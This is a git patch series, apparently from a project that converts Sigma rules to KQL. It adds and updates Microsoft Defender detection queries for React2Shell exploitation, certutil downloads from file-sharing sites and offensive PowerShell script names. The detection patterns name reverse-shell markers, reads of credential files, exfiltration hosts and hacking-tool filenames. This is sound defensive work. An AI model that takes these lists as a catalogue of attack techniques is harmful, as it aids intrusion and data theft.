ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/sigma b/sigma index 0a6d9299..0490e31e 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit 0a6d9299743af4efec4268899b02d3d5c9335a1d +Subproject commit 0490e31eb5b4bfc5e98ef66bbc4870176e4bed9e From c7a903d5febb518b70acd451f1e8273f95b76e23 Mon Sep 17 00:00:00 2001 From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 14 Dec 2025 02:40:21 +0000 Subject: [PATCH 14/17] chore: update KQL rules from latest Sigma rules --- ...cious_child_process_from_node_js_react2shell.kql | 13 +++++++++++++ ...cious_child_process_from_node_js_react2shell.kql | 13 +++++++++++++ .../process_creation/gui_input_capture_macos.kql | 2 +- ...on_of_werfault_exe_wer_dll_in_unusual_folder.kql | 2 +- .../desktop_ini_created_by_uncommon_process.kql | 13 +++++++++++++ ...system_process_name_in_unsuspected_locations.kql | 2 +- .../malicious_powershell_scripts_filecreation.kql | 2 +- ...ntially_suspicious_wdac_policy_file_creation.kql | 2 +- .../file/file_event/startup_folder_file_write.kql | 2 +- .../credui_dll_loaded_by_uncommon_process.kql | 2 +- .../load_of_rstrtmgr_dll_by_an_uncommon_process.kql | 2 +- ...em_dll_sideloading_from_non_system_locations.kql | 2 +- ...picious_volume_shadow_copy_vsstrace_dll_load.kql | 2 +- ..._dbgcore_dbghelp_dlls_from_uncommon_location.kql | 13 +++++++++++++ ...secure_loading_dbgcore_or_dbghelp_edr_freeze.kql | 13 +++++++++++++ .../image_load/wmic_loading_scripting_libraries.kql | 3 ++- ...ns_from_process_located_in_suspicious_folder.kql | 2 +- ..._potentially_suspicious_or_uncommon_location.kql | 2 +- ...cious_powershell_commandlets_processcreation.kql | 2 +- ...log_recon_activity_using_log_query_utilities.kql | 4 ++-- .../renamed_office_binary_execution.kql | 4 ++-- ...wnload_from_file_sharing_domain_via_curl_exe.kql | 2 +- ...wnload_from_file_sharing_domain_via_wget_exe.kql | 2 +- ...d_from_file_sharing_website_via_certutil_exe.kql | 2 +- ...ode_currentversion_autorun_keys_modification.kql | 2 +- sigma | 2 +- 26 files changed, 89 insertions(+), 23 deletions(-) create mode 100644 KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql create mode 100644 KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql create mode 100644 KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql create mode 100644 KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql create mode 100644 KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql new file mode 100644 index 00000000..2dfa149d --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/linux_suspicious_child_process_from_node_js_react2shell.kql @@ -0,0 +1,13 @@ +// Title: Linux Suspicious Child Process from Node.js - React2Shell +// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali +// Date: 2025-12-05 +// Level: high +// Description: Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell). +// This rule particularly looks for exploitation of vulnerability on Node.js Servers where attackers abuse Node.js child_process module to execute arbitrary system commands. +// When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c ). +// For other methods, the Image field will show the spawned process directly. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182 + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "/node_modules/next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "node_modules/.bin" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "/node") and (((ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami") or ((FolderPath endswith "/busybox" or FolderPath endswith "/cat" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/dig" or FolderPath endswith "/head" or FolderPath endswith "/id" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/java" or FolderPath endswith "/less" or FolderPath endswith "/lua" or FolderPath endswith "/more" or FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/netstat" or FolderPath endswith "/nslookup" or FolderPath endswith "/perl" or FolderPath endswith "/ping" or FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/ruby" or FolderPath endswith "/socat" or FolderPath endswith "/tail" or FolderPath endswith "/wget" or FolderPath endswith "/whoami") or FolderPath contains "/python")) or (FolderPath endswith "/sh" and (not(FolderPath endswith "-c"))) or ((FolderPath endswith "-c" and FolderPath endswith "/sh") and (ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql new file mode 100644 index 00000000..9d3f7330 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql @@ -0,0 +1,13 @@ +// Title: Windows Suspicious Child Process from Node.js - React2Shell +// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali +// Date: 2025-12-05 +// Level: high +// Description: Detects suspicious child processes started by Node.js server processes on Windows, which may indicate exploitation of vulnerabilities like CVE-2025-55182 (React2Shell). +// Attackers can abuse the Node.js 'child_process' module to run system commands or scripts using methods such as spawn(), exec(), execFile(), fork(), or execSync(). +// If execSync() or exec() is used in the exploit, the command line often shows a shell (e.g., cmd.exe /d /s /c ...) running a suspicious command unless other shells are explicitly invoked. +// For other methods, the spawned process appears directly in the Image field unless a shell is explicitly used. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182 + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "\\node_modules\\next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "next\" start" or InitiatingProcessCommandLine contains "node_modules\\.bin\\\\..\\next" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "\\node.exe") and (((ProcessCommandLine contains "\\net" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil " or ProcessCommandLine contains "conhost --headless" or ProcessCommandLine contains "cscript " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "java" or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "netsh" or ProcessCommandLine contains "nslookup " or ProcessCommandLine contains "perl" or ProcessCommandLine contains "ping " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "python" or ProcessCommandLine contains "reg " or ProcessCommandLine contains "reg.exe" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "sc.exe" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wmic" or ProcessCommandLine contains "wscript") or ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\OpenConsole.exe" or FolderPath endswith "\\perl.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\py.exe" or FolderPath endswith "\\python.exe" or FolderPath endswith "\\pythonw.exe" or FolderPath endswith "\\pyw.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") or FolderPath contains "\\python")) or (FolderPath endswith "\\cmd.exe" and (not(ProcessCommandLine contains "/d /s /c "))) or ((ProcessCommandLine contains "/d /s /c " and FolderPath endswith "\\cmd.exe") and (not((ProcessCommandLine contains "git config --local --get remote.origin.url" or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -CAROOT") or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -install ") or (ProcessCommandLine contains "netstat -ano | findstr /C:" and ProcessCommandLine contains " | findstr LISTENING")))))) \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/gui_input_capture_macos.kql b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql index 084037f2..4c4c9582 100644 --- a/KQL/rules/macos/process_creation/gui_input_capture_macos.kql +++ b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql @@ -9,4 +9,4 @@ // - Legitimate administration tools and activities DeviceProcessEvents -| where FolderPath =~ "/usr/sbin/osascript" and (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") \ No newline at end of file +| where (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") and FolderPath endswith "/osascript" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql index 3bec8773..783d94c9 100644 --- a/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql +++ b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql @@ -7,4 +7,4 @@ // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 DeviceFileEvents -| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file +| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\UUS\\arm64\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql new file mode 100644 index 00000000..d4c27717 --- /dev/null +++ b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql @@ -0,0 +1,13 @@ +// Title: Desktop.INI Created by Uncommon Process +// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) +// Date: 2020-03-19 +// Level: medium +// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Operations performed through Windows SCCM or equivalent +// - Read only access list authority + +DeviceFileEvents +| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not(((InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\" and FolderPath contains "\\JetBrains\\apps\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql index 90c132a2..2867167c 100644 --- a/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql +++ b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql @@ -11,4 +11,4 @@ // - Third party software naming their software with the same names as the processes mentioned here DeviceFileEvents -| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\wuauclt.exe")))) \ No newline at end of file +| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or ((InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\SysWOW64\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe"))))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql index 9b6c558c..4b9046be 100644 --- a/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql +++ b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql @@ -7,4 +7,4 @@ // Tags: attack.execution, attack.t1059.001 DeviceFileEvents -| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or 